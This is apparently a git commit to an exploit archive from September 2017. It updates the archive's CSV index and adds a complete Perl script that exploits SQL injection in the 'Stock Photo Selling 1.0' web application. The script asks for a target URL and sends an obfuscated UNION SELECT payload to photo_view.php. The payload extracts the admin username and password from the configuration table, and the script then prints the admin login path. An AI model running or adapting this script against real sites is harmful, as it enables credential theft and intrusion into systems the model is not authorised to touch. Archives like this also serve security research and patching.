DB: 2017-09-23

1 new exploits Linux Kernel <= 4.13.1 - BlueTooth Buffer Overflow (PoC) Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) Stock Photo Selling 1.0 - SQL Injection
2017-09-23 11:07:27 +00:00 · 2017-09-23 11:07:27 +00:00 · 90ecd7f9e4
commit 90ecd7f9e4
parent 92bfb7616d
2 changed files with 61 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -5680,7 +5680,7 @@ id,file,description,date,author,platform,type,port
 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0
 42759,platforms/windows/dos/42759.html,"Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read",2017-09-19,"Google Security Research",windows,dos,0
-42762,platforms/linux/dos/42762.txt,"Linux Kernel <= 4.13.1 - BlueTooth Buffer Overflow (PoC)",2017-09-21,"Marcin Kozlowski",linux,dos,0
+42762,platforms/linux/dos/42762.txt,"Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)",2017-09-21,"Marcin Kozlowski",linux,dos,0
 42763,platforms/windows/dos/42763.html,"Microsoft Edge - Chakra Incorrectly Parses Object Patterns",2017-09-21,"Google Security Research",windows,dos,0
 42764,platforms/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos,0
 42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'",2017-09-21,"Google Security Research",windows,dos,0
@ -38544,3 +38544,4 @@ id,file,description,date,author,platform,type,port
 42754,platforms/php/webapps/42754.txt,"Tecnovision DLX Spot - Authentication Bypass",2017-05-19,"Simon Brannstrom",php,webapps,0
 42755,platforms/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-19,"Simon Brannstrom",php,webapps,0
 42761,platforms/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting",2017-09-21,"Ishaq Mohammed",php,webapps,0
+42768,platforms/php/webapps/42768.pl,"Stock Photo Selling 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0
--- a/platforms/php/webapps/42768.pl
+++ b/platforms/php/webapps/42768.pl
@ -0,0 +1,59 @@
+#!/usr/bin/perl -w
+# # # # # 
+# Exploit Title: Stock Photo Selling Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 21.09.2017
+# Vendor Homepage: http://sixthlife.net/
+# Software Link: http://sixthlife.net/product/stock-photo-selling-website/
+# Demo: http://www.photoreels.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+sub clear{
+system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
+clear();
+print "
+################################################################################
+                   #### ##     ##  ######     ###    ##    ## 
+                    ##  ##     ## ##    ##   ## ##   ###   ## 
+                    ##  ##     ## ##        ##   ##  ####  ## 
+                    ##  #########  ######  ##     ## ## ## ## 
+                    ##  ##     ##       ## ######### ##  #### 
+                    ##  ##     ## ##    ## ##     ## ##   ### 
+                   #### ##     ##  ######  ##     ## ##    ## 
+
+             ######  ######## ##    ##  ######     ###    ##    ## 
+            ##    ## ##       ###   ## ##    ##   ## ##   ###   ## 
+            ##       ##       ####  ## ##        ##   ##  ####  ## 
+             ######  ######   ## ## ## ##       ##     ## ## ## ## 
+                  ## ##       ##  #### ##       ######### ##  #### 
+            ##    ## ##       ##   ### ##    ## ##     ## ##   ### 
+             ######  ######## ##    ##  ######  ##     ## ##    ##                                                                            
+                 Stock Photo Selling Script 1.0 - SQL Injection           
+################################################################################
+";
+use LWP::UserAgent;
+print "\nInsert Target:[http://site.com/path/]: ";
+chomp(my $target=<STDIN>);
+print "\n[!] Exploiting Progress.....\n";
+print "\n";
+$tt="tbl_configurations";
+$cc="(/*!00007SELECT*/%20GROUP_CONCAT(0x3c74657874617265613e,0x557365726e616d653a,admin_name,0x2020202020,0x50617373776f72643a,admin_password,0x3c2f74657874617265613e%20SEPARATOR%200x3c62723e)%20/*!00007FROM*/%20".$tt.")";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0');
+$host = $target . "photo_view.php?photo_sid=-d1fe173d08e959397adf34b1d77e88d7'%20%20/*!00007UNION*/(/*!00007SELECT*/%200x283129,0x283229,0x283329,".$cc.",0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629)--%20-";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/<textarea>(.*?)<\/textarea>/){
+print "[+] Success !!!\n";
+print "\n[+] Admin Detail : $1\n";
+print "\n[+]$target/admin/index.php?mod=login\n";
+print "\n";
+}
+else{print "\n[-]Not found.\n";
+}